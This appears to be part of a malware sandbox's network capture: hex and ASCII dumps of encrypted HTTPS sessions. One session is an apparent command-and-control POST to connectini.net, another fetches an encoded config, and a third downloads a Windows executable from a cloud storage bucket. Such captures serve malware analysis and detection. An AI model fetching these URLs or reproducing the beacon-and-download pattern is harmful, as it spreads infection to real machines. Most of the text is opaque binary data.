42 26 de 3e 5d 1c 2b 22 03 1d 1c b1 dc f6 2e 0e f2 b2 af e9 2b
                                                                                                                          Data Ascii: Tek9TrOAl"Q<%}h{yx>*Za*7VgX)Sut{z'tyNn<%}=6p1;TC^lp ^KO/x~3Z.]`SpjC'@~Kw%PI`\B"`vX|TB&>]+".+
                                                                                                                          2022-05-21 07:32:36 UTC1289INData Raw: f9 bc 57 31 b8 bb 5e 5a ec b6 59 bb c2 13 9f 73 25 32 ae a3 ef 51 68 11 93 cc bb 64 3f 21 f5 8e 0a aa f6 ff f9 9b 81 16 91 9e b0 dd 0a 08 db 91 bd 7b 26 77 60 31 4b aa b3 f3 bf b8 f5 2a a4 23 0b 98 f7 30 8a 17 0b 33 90 70 82 da 51 46 c6 c2 64 2a 63 68 93 23 ce 11 55 76 ae 58 cb 43 25 04 6a 31 69 ba 65 aa 0c d7 92 6a c0 30 6b 34 df b0 01 f9 53 0a 0e 8b 0f 75 45 70 4a ac 04 7f ac f6 2d 75 3c 51 3c 5e e4 f8 7b b4 c7 0d 5b ba 9b c7 97 7e a2 ba 8f 28 60 2f a6 45 11 fc 50 7e 92 34 b9 8b 96 4a dc ca 22 ac f8 40 7f fe 78 66 8d 20 0d 94 83 6a d4 6f 21 77 aa ba 6b fe f7 ee fc c5 04 7b 2d 9b 03 38 15 1a ed 77 5a ed 34 79 dd 37 b8 a9 6d 5c f0 8d 0f 10 07 9f 6e 79 5f ff 5d a2 82 fc 5d 99 37 75 3b bc cc e1 c3 ce 8b 2f 07 39 73 c0 e4 2c e4 a7 ff c3 4c 5d 5c cf d1 7f 5d
                                                                                                                          Data Ascii: W1^ZYs%2Qhd?!{&w`1K*#03pQFd*ch#UvXC%j1iej0k4SuEpJ-u<Q<^{[~(`/EP~4J"@xf jo!wk{-8wZ4y7m\ny_]]7u;/9s,L]\]
                                                                                                                          2022-05-21 07:32:36 UTC1305INData Raw: 12 5f 30 e6 31 72 8a 9c cb 9d 34 20 46 ce c3 a7 06 12 f4 3b a1 dd e9 66 92 e0 54 d7 88 79 20 90 ce f9 94 15 dc 4a 4c 1c 92 3a 27 3e 90 f2 f0 f1 19 f3 b1 97 0d e6 0d 8c 1d 30 eb 2c 86 d7 1a 58 d9 4f 72 e4 a1 7f dc bc 3c fc 99 a7 99 49 25 f4 a3 21 8e d2 64 18 f0 d2 01 ed 18 48 ca 37 7a 1b e7 1a ac 35 a6 4f ec 57 b6 4e 35 6c 2d 0c 64 db 81 78 25 87 00 df fa 01 69 58 9b 40 b4 3a 67 43 ad 90 9d 4e f8 aa 74 fe 4c 81 ce c0 31 b6 6b 82 52 7f e8 d2 d4 65 84 c8 58 a4 fc 2a 4d 54 df a7 c8 f2 df be 8a fd 53 da 16 b6 3b e5 8e 77 ef 19 06 5e 0f 26 08 7d 13 5e ec 04 c0 eb 5c cc 4f 20 96 26 11 f4 3c 02 8c 17 8f bb 28 f9 8d 4f da 5f 14 65 f7 48 e0 1f 5b d0 4d c8 d1 ca b5 d5 ff 0b ee ac 3e 79 cf 7f 7f c9 2d 73 15 65 74 96 1d e2 d9 33 d4 0a a9 41 61 df 3a b4 c6 41 77 4f ad
                                                                                                                          Data Ascii: _01r4 F;fTy JL:'>0,XOr<I%!dH7z5OWN5l-dx%iX@:gCNtL1kReX*MTS;w^&}^\O &<(O_eH[M>y-set3Aa:AwO
                                                                                                                          2022-05-21 07:32:36 UTC1321INData Raw: e5 10 82 b4 05 1c e9 07 2f 41 11 8c 4d d4 d8 70 e5 a0 a2 f3 3e d4 e9 02 24 9b d8 03 51 cf b3 f2 61 53 2c 09 ac 34 ef 74 4e 2f 8e d8 71 87 08 61 52 cd 00 5d 42 77 47 fb 1a ea df 7a d3 be 26 25 61 5b a7 72 e7 e2 a1 84 a3 5a ff d4 07 39 b1 c1 09 71 bf 76 b7 d3 81 94 e6 e5 7c 89 73 04 ff c5 fd cc c2 01 7e 07 d5 41 fa 94 31 1f 60 e8 1a 81 8d 74 b6 c9 b4 ba 97 19 8f 84 77 e9 ef c8 08 00 d9 e8 63 1a 13 ba ab fb 4d 2d df b8 99 25 88 2a 10 8a 9d 26 6f 93 14 54 1a d6 4e 35 45 c5 71 9c 1f 8b 3e e0 2f 7d ff 06 da 65 bc 19 ae 92 d6 87 8b 84 cd 2b a4 09 ad 11 49 1a 43 53 66 ae 9a 9a 4a fe 37 ba 8f 7f 6b 5a 72 f3 21 8d dc d3 8c 6a 00 c8 07 78 80 7b 30 28 bf 21 0e 2d fc ec bb 7f 59 85 de 24 44 c7 b4 ea 23 af 67 b1 27 cf e6 66 e4 76 36 de 3f 05 49 9b 59 04 26 00 ec 32 4d
                                                                                                                          Data Ascii: /AMp>$QaS,4tN/qaR]BwGz&%a[rZ9qv|s~A1`twcM-%*&oTN5Eq>/}e+ICSfJ7kZr!jx{0(!-Y$D#g'fv6?IY&2M
                                                                                                                          2022-05-21 07:32:36 UTC1337INData Raw: 9f 11 08 08 3f 60 df c7 5b 91 9f 03 f7 36 96 e3 88 d8 24 18 a9 15 06 8d 2d b9 50 39 9c e0 d3 1d ab ad 23 aa 60 97 9a 11 e0 aa 55 1d c1 ff 44 df 55 0d 70 54 fd d9 d1 21 53 8c 49 54 f1 93 4f a2 12 c3 df a5 35 b9 b8 d5 50 5c ab 08 4d 2d 2b 31 c1 56 ea eb 6d 3b 13 65 45 0c 99 a0 af e7 c6 a9 74 31 4a 68 91 58 47 3f 06 2c f0 a4 0b dc 31 db a9 f0 f3 51 0a d6 c8 d1 b4 21 3a f1 8d 70 e5 c1 7f 83 c1 5c 85 f3 e5 f7 32 83 d9 e9 33 07 8d 76 39 88 1a 02 8d 1c bb 2c ef cd a2 c4 2b 97 59 1c d6 9a ef 20 6a 2a ff 17 90 8d d2 b6 b4 59 cc 97 61 f1 23 c7 50 4b ee 52 59 77 4f 98 90 65 91 5d 16 a0 3d b8 87 bb 7e 67 51 f0 fc 00 98 3a 23 34 4c 19 ba 59 37 f5 da df f6 0c 4c fd 7f 36 c0 c5 1a 2c 2b bb b3 7e a9 64 76 e0 9c 5e 41 19 e6 c2 8f 5e 27 80 5a 1c 8e 82 f0 80 1a 6e c4 f9 ef
                                                                                                                          Data Ascii: ?`[6$-P9#`UDUpT!SITO5P\M-+1Vm;eEt1JhXG?,1Q!:p\23v9,+Y j*Ya#PKRYwOe]=~gQ:#4LY7L6,+~dv^A^'Zn
                                                                                                                          2022-05-21 07:32:36 UTC1353INData Raw: b7 99 3f 51 2f 49 e6 a9 57 7e f2 46 e7 5d 7d 3e c5 b5 74 7e 84 04 eb ba 06 9d a3 61 26 fc 1b 9e 4f 0a d4 44 15 b9 83 55 bc e7 cd 61 8b 84 5f d5 d3 e6 8a f4 bc 45 aa d3 fe b6 e0 e3 00 09 6a e1 e0 c3 37 ae 1b e7 7e ff 99 37 af a2 32 8c aa ff 75 30 e5 79 fb b9 07 e5 b9 e1 87 58 ec c5 ef 49 b9 3f 5a 1b 6d 14 b1 76 8c 06 f9 b7 56 6a 26 5f 7d 74 ff c9 af 70 73 48 6d f6 b5 d7 53 99 ac c1 e5 9d 69 5b 35 05 04 71 ed 91 1a 04 19 d8 86 29 38 de bc ce 6e 6b 28 1c 26 74 6d ed 2d 60 21 df 5f c5 82 c8 ec 6c a3 6d 42 95 6b d5 2c 99 a4 b1 f8 ae 3d a5 33 e0 c0 fc 55 d2 10 03 8b 9b 8d b2 06 0e fd f9 8a 74 78 0e 3d ea d7 1b 33 7f 6b 0a 0b ad d7 a2 bb 15 9e 53 a4 37 81 49 cb 55 8a 9b 60 16 ff 43 93 e7 d0 cb 7f eb ae ee c2 c5 23 dd 86 84 51 aa 3d ef aa 1f aa 00 8c f0 c5 7c 16
                                                                                                                          Data Ascii: ?Q/IW~F]}>t~a&ODUa_Ej7~72u0yXI?ZmvVj&_}tpsHmSi[5q)8nk(&tm-`!_lmBk,=3Utx=3kS7IU`C#Q=|
                                                                                                                          2022-05-21 07:32:36 UTC1369INData Raw: 33 1a 83 14 57 73 0a ca 01 d2 84 94 c2 b2 71 86 b8 f4 ff 7b 7a 1d cf cc 94 2c 2d df 10 3f 8a 2d 54 1a 58 19 76 02 a3 5a c8 1b e9 a9 7e 46 4b 67 1f e5 7b ad c2 56 ab 71 aa b2 47 c9 a7 ee 5e 61 0d 9f be bd a3 6d cf 56 81 28 a5 d2 52 ec 77 29 61 04 d4 ab a9 f5 f0 d0 09 7c 25 af fa b5 d7 9e de 2c 8e fb 12 8a e9 9d 1d c1 64 df 39 69 c4 bc 73 84 ef f2 3f ac 9b 9d a8 f2 c4 38 9e 9f 51 19 81 82 c2 e2 47 eb 5d 13 c3 1f c5 91 96 f9 cf 9f 17 c3 32 eb 5f 71 66 66 8f a0 10 90 dc 23 38 68 41 db 3e e8 76 10 b7 3f 46 57 23 64 03 be 76 48 2f 26 d8 3d 42 85 30 e8 62 78 ba 11 6d 3b f0 1a 5e 04 82 27 04 83 15 93 d9 bf c0 48 5f 78 74 1f e3 f7 a8 74 9c a3 0c 3a 9f 26 89 51 5f 8f 9f 7f 3d 9a c7 0c 98 fa 30 af e6 50 87 d5 92 82 ac ba a8 b2 19 ae c0 e6 b7 39 fe 88 b9 e8 6d cd a1
                                                                                                                          Data Ascii: 3Wsq{z,-?-TXvZ~FKg{VqG^amV(Rw)a|%,d9is?8QG]2_qff#8hA>v?FW#dvH/&=B0bxm;^'H_xtt:&Q_=0P9m
                                                                                                                          2022-05-21 07:32:36 UTC1385INData Raw: f5 72 79 ab 99 00 aa 22 bf b1 3a 39 d5 e6 e9 ef de fa aa 5c 0c 4b ea 77 9c 96 72 11 63 f3 0e 36 cc 79 a7 c1 6c fe e2 c1 7f e7 ee a0 12 c2 ff cc ab bf 0a 5b ec e6 c3 9f 62 62 e8 12 a8 0e e1 b4 f9 25 c9 15 91 6d db 9e f7 ab 2c 9d 0a 5e b6 6b 6c 77 9b c8 f2 19 29 98 7c 34 a5 19 04 cb 74 44 8e d1 e4 6c 09 76 ac 5d 2a 18 a3 da 3c c1 94 31 34 9d 58 81 c0 43 84 b2 bf df 2e 32 4e a3 81 30 bd 05 fa 71 97 42 ec 1f 76 d8 6d 53 bc 2c e0 f4 cb f5 cb 18 bd b0 ba 6c 64 19 c2 45 b3 18 d6 da ea ea f5 bf e7 45 6e e2 2f 63 13 91 07 b7 09 db 00 ee 14 8e 22 40 3f df 72 26 ba 0f b0 74 3a a5 e4 5d 38 1e 33 d5 6b ba 8d ff a3 d2 56 16 0b dd ff 22 85 55 0c 4d 13 97 86 de 61 a8 99 b3 44 d7 92 78 f6 5e 46 2e 67 34 9f 2c 12 b3 a9 f9 19 5f 68 cf ea 96 46 95 d8 a3 8b 92 a4 6f d9 b0 06
                                                                                                                          Data Ascii: ry":9\Kwrc6yl[bb%m,^klw)|4tDlv]*<14XC.2N0qBvmS,ldEEn/c"@?r&t:]83kV"UMaDx^F.g4,_hFo
                                                                                                                          2022-05-21 07:32:36 UTC1401INData Raw: 50 14 94 05 80 ba 5d 22 33 6d 1b f5 49 b7 0c dd 33 c0 2e 63 6f e5 87 c0 cb 6d 77 af 52 d6 cc d6 22 5e e0 2b 6c 09 65 60 7d 22 85 60 5f 69 ea 97 8e 88 ce 6e 6a 9b 15 32 8c 3c 89 f5 9c f4 b8 69 22 7c d4 63 a0 56 1c c4 94 64 d3 a4 ca 8c 8d 25 45 23 84 99 b8 33 f6 cb 5f 59 05 fc f4 25 57 ad 48 0b ce ae 5a a1 9b c0 a0 03 ea b1 8b 5a 11 4e ab e9 ad 08 73 9a 36 67 a1 04 d8 00 07 aa c7 58 6a 76 47 fe 70 9e 63 e1 42 73 83 17 80 9d 7d dd 65 71 b4 eb 8f 5b 66 b3 55 0e 5f 78 ee c5 0f be f5 f9 0c 12 30 f8 7d 23 f5 7c 07 51 36 ba 83 5b e0 85 f2 f2 17 6a 47 e3 4a 0f 0a 07 6a ac f3 a6 2d 3e 01 c5 84 fe b8 8e fe 9f 25 1c 1b af f0 f5 dc ec 91 d7 a7 65 fd 5e 7a 27 79 90 14 ee 4e f9 e6 9c 60 bf cc c1 46 74 e6 9e d0 41 5b f1 e6 98 5e b5 96 0a a8 78 ec 72 71 6a de 26 85 93 bb
                                                                                                                          Data Ascii: P]"3mI3.comwR"^+le`}"`_inj2<i"|cVd%E#3_Y%WHZZNs6gXjvGpcBs}eq[fU_x0}#|Q6[jGJj->%e^z'yN`FtA[^xrqj&
                                                                                                                          2022-05-21 07:32:36 UTC1417INData Raw: 94 51 3f 95 30 73 49 b2 98 0f 4e 00 a1 14 aa d2 bc 09 3c 0d 98 96 fc 4a fe a0 a3 cd 8f 54 23 9d 74 0d cb db 96 e8 fe 61 38 3a 4e 5d 3d 65 2c 69 f3 22 68 37 df 7e f3 67 87 70 90 21 6e 9a 02 ac bb 11 80 81 a2 27 c2 86 e4 32 f6 60 0f 35 4f a4 1f 18 5c 36 f3 0d 66 be cb 31 2c 76 21 38 b5 36 22 84 09 97 77 ae 40 1d f3 81 fe d6 93 91 ef 6f e9 53 f8 a3 70 09 5a 94 f2 9f 14 b9 19 3a bb 4c 77 d7 5f c4 83 ac ca 57 0b 66 c4 8a db f0 d9 44 ad e1 35 a1 e6 e3 35 60 53 85 0c 0e dc ff 9b 30 f2 a0 87 df 4e 21 fb 32 67 71 eb 9c 72 5f 6f a3 c5 ae d0 f4 5c dd 46 fa 4b c8 96 19 2e 1d cf e7 bd 52 b7 7b 23 b9 b6 22 c2 e6 02 ed 50 ff 87 37 f5 a6 7f c8 bf 47 ff 06 0e f6 32 05 7f bc 24 44 6b 01 0b 44 a1 ed 58 c9 7d 93 4f f4 b4 91 57 46 45 0e 42 92 a2 cb 96 1c b5 3e 7c 1d 9a df 6c
                                                                                                                          Data Ascii: Q?0sIN<JT#ta8:N]=e,i"h7~gp!n'2`5O\6f1,v!86"w@oSpZ:Lw_WfD55`S0N!2gqr_o\FK.R{#"P7G2$DkDX}OWFEB>|l
                                                                                                                          2022-05-21 07:32:36 UTC1433INData Raw: 6d ee 04 fa 35 53 02 55 4b 6f 4e f9 df bd e1 c5 da b2 84 91 0f 2c 59 be 64 93 ee b4 1d 9e ea 16 7f 26 4f 2c d1 84 6b bc e3 be 2b bc e3 f6 c2 0a ed 81 b5 ed 27 bb 51 59 1a 25 f1 ea f4 bd 14 15 1f 87 11 38 47 e7 20 ef 16 05 70 50 19 24 f9 85 17 4c d0 9b c9 87 ae b6 08 ee db 41 59 7c 9f 16 88 9f e1 d4 72 83 25 2c 5e 86 51 91 63 5c 71 f9 82 0f 58 5a f4 b5 ae a1 4c a7 86 e3 c1 b8 a9 d8 61 58 11 e7 c2 5c 21 3a a0 71 52 ab bd 21 f9 de 01 b9 fd d7 45 88 56 9a 8c ca fc 5b 7b 3e 6e 1d a4 e6 c7 35 e1 d6 20 b9 e4 1f ef cb 56 92 13 c5 20 56 d9 d5 e5 95 4e 0f ec 51 70 c3 64 4f 66 a0 a8 eb 6d db c1 17 f1 2d bc 7b 28 0f 52 54 de 24 7b 81 65 eb 3c ce c6 65 9c 0c 4b bf 95 ee 36 ae f7 8d 3a 85 7e 72 62 dd f3 8c 45 d3 39 5a 1a e7 d6 5d 69 1a 3e 91 dc 9f 39 07 d8 b5 70 04 14
                                                                                                                          Data Ascii: m5SUKoN,Yd&O,k+'QY%8G pP$LAY|r%,^Qc\qXZLaX\!:qR!EV[{>n5 V VNQpdOfm-{(RT${e<eK6:~rbE9Z]i>9p
                                                                                                                          2022-05-21 07:32:36 UTC1449INData Raw: b9 3e 64 33 95 95 39 c2 84 8f 28 26 b9 be 8e 6a dd cd f8 e4 ae b0 48 05 b1 e9 d2 af 10 cb 45 8e 40 cb c4 0a 52 bf be 59 ab 4f f4 e1 a7 f2 46 98 55 54 da 71 d8 f7 ee 51 c1 ff 68 e1 d1 fe 63 51 d6 b5 36 c4 68 2a eb 51 3b 09 ea fe 32 f7 fa f6 6a 02 10 2a 74 a8 24 61 49 d9 66 ab 38 e0 84 1a 80 d5 14 a5 cf 4f 92 b7 d8 eb 31 a8 c9 8e 64 05 89 e7 fd 9b cc 79 2e 60 f3 64 09 29 c2 19 ea 03 b7 1d 15 85 04 a9 3b 30 7a 0b 55 d6 fe 32 e8 35 35 0b 00 cf a3 05 18 25 d9 53 4a 46 0b 2c 36 2d 84 6e e7 0b 19 e3 0a aa 87 81 fd 8f 44 20 8f c1 ce b8 c2 c9 65 ff a1 2c df 7c cc cd a2 f7 c2 22 ef 09 0b 58 5c f8 b0 3c c6 23 09 da 37 2b 8d cf f2 cb 83 83 39 18 ba 10 89 24 e3 20 0b 10 77 24 83 2e b8 5f 79 b4 b0 f6 d6 3f f3 62 84 b5 55 1d 9e 28 3b 43 9a 59 33 4b b2 62 b7 d1 5e 9e 63
                                                                                                                          Data Ascii: >d39(&jHE@RYOFUTqQhcQ6h*Q;2j*t$aIf8O1dy.`d);0zU255%SJF,6-nD e,|"X\<#7+9$ w$._y?bU(;CY3Kb^c
                                                                                                                          2022-05-21 07:32:36 UTC1465INData Raw: 5d 3a 77 ce f4 53 74 2a 18 0c 8a 05 f4 5e 2e 1d b0 53 0b 1b a4 a3 e3 5e ef a4 0c 6b 6d 86 e1 12 06 45 8c 39 c7 be ff 46 c4 b6 33 d2 19 1b 27 c2 fa 87 07 c6 ae ce 3e 84 ac 04 e0 ab 7c f7 0e 48 62 63 b9 64 60 52 a8 84 bf d2 23 df 5d 93 b2 08 b5 29 ce b8 b0 3e ee f3 24 55 b1 cd d7 19 2e 61 9a 48 88 73 69 09 b3 a2 a7 b4 02 95 82 7a 2d d0 b9 19 4d d8 1d 1b 50 02 d4 99 9d 93 e7 63 cb c2 3e 00 6c c8 e2 a3 83 1c 2a 4e db 62 26 c9 53 17 e8 ac db ab 5f d3 bf d8 a8 a7 ed a6 45 1d 67 cd b7 50 18 84 bf 2e e8 e2 2f 03 0d 1a d6 18 23 ed 4f 2f f1 9a 3b 57 d9 9b 8e a4 84 dd 5e d1 46 9a 76 3d c5 69 53 0e 4a 8c 3a 83 31 d6 0e 4d 1b 2c 10 8e f4 1d d0 93 4e 80 d4 7a ff e0 d4 06 26 df 2e 30 c6 0e 29 0c 62 20 65 d6 35 f1 07 29 c2 29 d8 e0 29 ff db 17 33 93 27 33 c0 fc 8b 62 2d
                                                                                                                          Data Ascii: ]:wSt*^.S^kmE9F3'>|Hbcd`R#])>$U.aHsiz-MPc>l*Nb&S_EgP./#O/;W^Fv=iSJ:1M,Nz&.0)b e5)))3'3b-
                                                                                                                          2022-05-21 07:32:36 UTC1481INData Raw: 0b 55 6d 07 cc bf 42 9d 9d b9 33 8f c0 4e 39 e4 8f 6d ae 05 da fe 7d c3 9d c6 b9 70 29 14 9f b2 d2 89 86 74 62 dd ae ae ed e6 ab 23 f9 81 44 83 3c 70 27 8b 27 cc e5 28 48 e0 4e 24 ba 99 38 23 b6 02 8f 3e 6c 2a 26 5a 85 36 9b fd 85 e6 0b eb 8d 9b 73 44 bd a1 bb 52 38 45 db f3 ff 05 e9 c2 b8 d7 e7 bf fd 5d da 9c 81 6a 17 b8 82 53 e1 50 16 9b f5 0c fe 42 c0 b2 fb 68 d1 1c 5f b8 7e 54 cb 02 36 62 ca ef ad a8 49 e3 e4 cf 23 60 22 6f 19 65 ee c2 1b f0 9d 9a fc 61 4f 9f 69 80 c6 c2 74 83 51 85 e9 b4 1b d9 c7 83 ac 77 39 7a 91 b4 10 c0 a4 f6 03 33 6e 91 ec 8f 19 77 b0 01 00 e4 7c dc 1a a3 8c 09 b7 32 9f 62 c0 42 f2 40 8f 09 a3 7e 90 31 a6 29 10 9b a4 b2 17 a5 3c 53 17 dd 00 77 1a ae 53 25 c3 13 93 1c d4 93 23 a0 7a 96 7d c4 0a 47 f3 f9 f5 b3 1b 51 00 26 e6 7b 20
                                                                                                                          Data Ascii: UmB3N9m}p)tb#D<p''(HN$8#>l*&Z6sDR8E]jSPBh_~T6bI#`"oeaOitQw9z3nw|2bB@~1)<SwS%#z}GQ&{
                                                                                                                          2022-05-21 07:32:36 UTC1497INData Raw: 84 7d e1 5a 88 ae dc 8c 16 5e 81 15 87 2d 06 08 07 73 10 c1 5e 98 77 cf d9 b4 ec d2 43 bf 51 ac d1 7f 95 ad bf 59 49 41 09 fd 11 53 fe 6b 8e 15 9e 29 ef 3b bb 23 86 63 09 de 5b 27 d9 67 08 c3 3d de 1d 36 5a 74 bd 5b 9b 9d 49 88 f3 ee 43 1e 04 bd 60 22 bd b2 cd 7b 12 80 d5 50 91 85 25 b0 62 bc 5e 00 42 85 79 6d c3 62 d8 9c 23 a7 20 f2 12 3e dc e7 fc 2c 1f 8b 0b 16 16 28 3b c6 23 db fb 01 31 d4 b0 05 09 8e 47 6e 01 d2 4c d0 f4 48 51 80 5e 90 ad c7 8e a4 a8 84 fe 01 5e 4e bb 0f 8d 33 fa 37 77 ea 06 a3 7a 61 42 e2 2c 1e d6 c2 5b 6c 7f 2f b2 9f 4d 06 56 17 2f 0a 61 60 02 af 69 f2 de 4b 9d 29 1b d0 ae 53 f0 6d d1 48 41 f6 be 9a 3d 3e 62 ed ec 0d 19 c9 49 4e de 07 fe 6e f7 49 6f e6 5a 0c 5d 57 43 c6 22 26 d2 ad 29 1d 10 e1 9a 57 dd 8a 0a 03 34 93 57 8a 2b 19 58
                                                                                                                          Data Ascii: }Z^-s^wCQYIASk);#c['g=6Zt[IC`"{P%b^Bymb# >,(;#1GnLHQ^^N37wzaB,[l/MV/a`iK)SmHA=>bINnIoZ]WC"&)W4W+X
                                                                                                                          2022-05-21 07:32:36 UTC1513INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii:


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          6192.168.2.44980037.230.138.123443
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-05-21 07:32:35 UTC1081OUTPOST /Series/Conumer4Publisher.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Host: connectini.net
                                                                                                                          Cache-Control: no-store,no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Content-Length: 53
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2022-05-21 07:32:36 UTC1081INHTTP/1.1 100 Continue
                                                                                                                          2022-05-21 07:32:36 UTC1081OUTData Raw: 6a
                                                                                                                          Data Ascii: j
                                                                                                                          2022-05-21 07:32:36 UTC1081OUTData Raw: 69 67 6c 69 62 61 66 3d 4d 54 6b 65 4d 36 4b 70 76 61 30 6b 6c 70 5a 30 61 63 6a 77 64 37 4f 62 74 6c 34 31 39 67 38 5a 56 4a 75 6d 4d 30 30 49 4e 53 30 3d
                                                                                                                          Data Ascii: iglibaf=MTkeM6Kpva0klpZ0acjwd7Obtl419g8ZVJumM00INS0=
                                                                                                                          2022-05-21 07:32:36 UTC1240INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Sat, 21 May 2022 07:32:36 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          X-Powered-By: PHP/7.1.33
                                                                                                                          X-Powered-By: PleskLin
                                                                                                                          208
                                                                                                                          QGgXHfs+ChB2RcKS3DBhNXOldOR0A4llhKIijLyfTBkh+67RrwMfFaQWj+DSylGergDjNtDFfti4YE/rV7N37aPJVonlyVOROSpG7tTMq4nn4U8YZdaDM9AsbyGhYazLjS1wEO/oJZ36JQFqX3LQPILvCrxiw4OgOY+GsQrvuqAeokESh4tt6JjqnLjEIjDDmwPZWzEya0ilDhPwPcVwkFBhuxKkrozq4x6MzV9IE3PFSe+yzdY8FWyZwNXZLi4LrXs9xAWPwxeN8Z7az1lZcN0d+sQ3lCs8ksi29Z58/HNwmTgW7+0a3P3z/SWopeWa6afQPqCBTRKpfJgs29MrhVO8UritMZj+lv3ug/A9by7JBDTEhuirpwJUt9IHf2nSas/8EajOh/6HOkEhxIOLajXPxDiFkOnP7wdpn0QTzb43/CVbR7DPwCM/wpH036fIV943gGFyzGjgocHhIWLDlfHVnY/bPvQ4+qEu4IC6rw7WyLGRDdUiakcUO+Lz5ImE
                                                                                                                          0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          7192.168.2.44980137.230.138.123443
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-05-21 07:32:36 UTC1513OUTGET /Series/publisher/1/CH.json HTTP/1.1
                                                                                                                          Host: connectini.net
                                                                                                                          Cache-Control: no-store,no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          2022-05-21 07:32:36 UTC1513INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Sat, 21 May 2022 07:32:36 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Content-Length: 4184
                                                                                                                          Last-Modified: Mon, 11 Apr 2022 13:54:12 GMT
                                                                                                                          Connection: close
                                                                                                                          ETag: "62543304-1058"
                                                                                                                          X-Powered-By: PleskLin
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2022-05-21 07:32:36 UTC1513INData Raw: 7a 53 35 52 44 4a 50 4d 52 61 30 67 30 59 79 39 61 2f 51 34 56 68 72 77 74 6b 45 61 7a 69 35 70 6b 77 47 75 73 65 52 79 4d 33 75 6c 6c 7a 42 6a 4f 58 6a 5a 30 2f 51 7a 42 33 2f 7a 7a 4a 33 64 75 38 4b 50 4b 70 55 4e 51 50 46 7a 50 48 66 77 41 73 4a 67 39 57 52 4d 69 74 47 75 6b 69 30 68 6c 44 63 54 36 7a 7a 74 75 74 6e 69 6c 4e 4a 34 59 2b 72 39 2f 69 69 75 77 45 48 2f 77 49 67 4d 6e 2f 74 69 74 48 4d 6b 47 30 35 32 64 4f 53 33 61 2f 74 6c 79 6a 63 56 35 67 46 46 67 64 37 39 49 30 52 53 75 34 51 72 69 4d 38 41 35 73 30 7a 43 69 79 72 52 4c 52 32 6a 4b 70 59 41 2b 6d 56 30 41 71 6e 6d 6b 4e 50 74 36 64 42 4b 55 4a 31 6e 6c 53 48 63 45 2f 30 7a 76 6f 4c 63 34 4a 77 70 70 51 76 72 50 47 77 79 6a 55 4c 68 35 6b 42 32 43 62 43 66 72 68 30 75 49 71 47 42 54 4a
                                                                                                                          Data Ascii: zS5RDJPMRa0g0Yy9a/Q4VhrwtkEazi5pkwGuseRyM3ullzBjOXjZ0/QzB3/zzJ3du8KPKpUNQPFzPHfwAsJg9WRMitGuki0hlDcT6zztutnilNJ4Y+r9/iiuwEH/wIgMn/titHMkG052dOS3a/tlyjcV5gFFgd79I0RSu4QriM8A5s0zCiyrRLR2jKpYA+mV0AqnmkNPt6dBKUJ1nlSHcE/0zvoLc4JwppQvrPGwyjULh5kB2CbCfrh0uIqGBTJ


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          8192.168.2.449802151.115.10.1443
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-05-21 07:32:40 UTC1517OUTGET /ultimate/hand-uqc3q25p48egzty7.exe HTTP/1.1
                                                                                                                          Host: yuuichirou-hanma.s3.pl-waw.scw.cloud
                                                                                                                          2022-05-21 07:32:40 UTC1517INHTTP/1.1 200 OK
                                                                                                                          Content-Length: 27136
                                                                                                                          x-amz-id-2: txce005ae0b24c4d3289d57-0062889598
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Last-Modified: Wed, 04 May 2022 23:37:31 GMT
                                                                                                                          ETag: "074eb8516759fb6a29f4620132146e03"
                                                                                                                          x-amz-request-id: txce005ae0b24c4d3289d57-0062889598
                                                                                                                          x-amz-version-id: 1651707451543634
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Date: Sat, 21 May 2022 07:32:40 GMT
                                                                                                                          Connection: close
                                                                                                                          2022-05-21 07:32:40 UTC1518INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 2f 69 b9 f2 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 36 00 00 00 32 00 00 00 00 00 00 ae 54 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL/i"062T `@ @
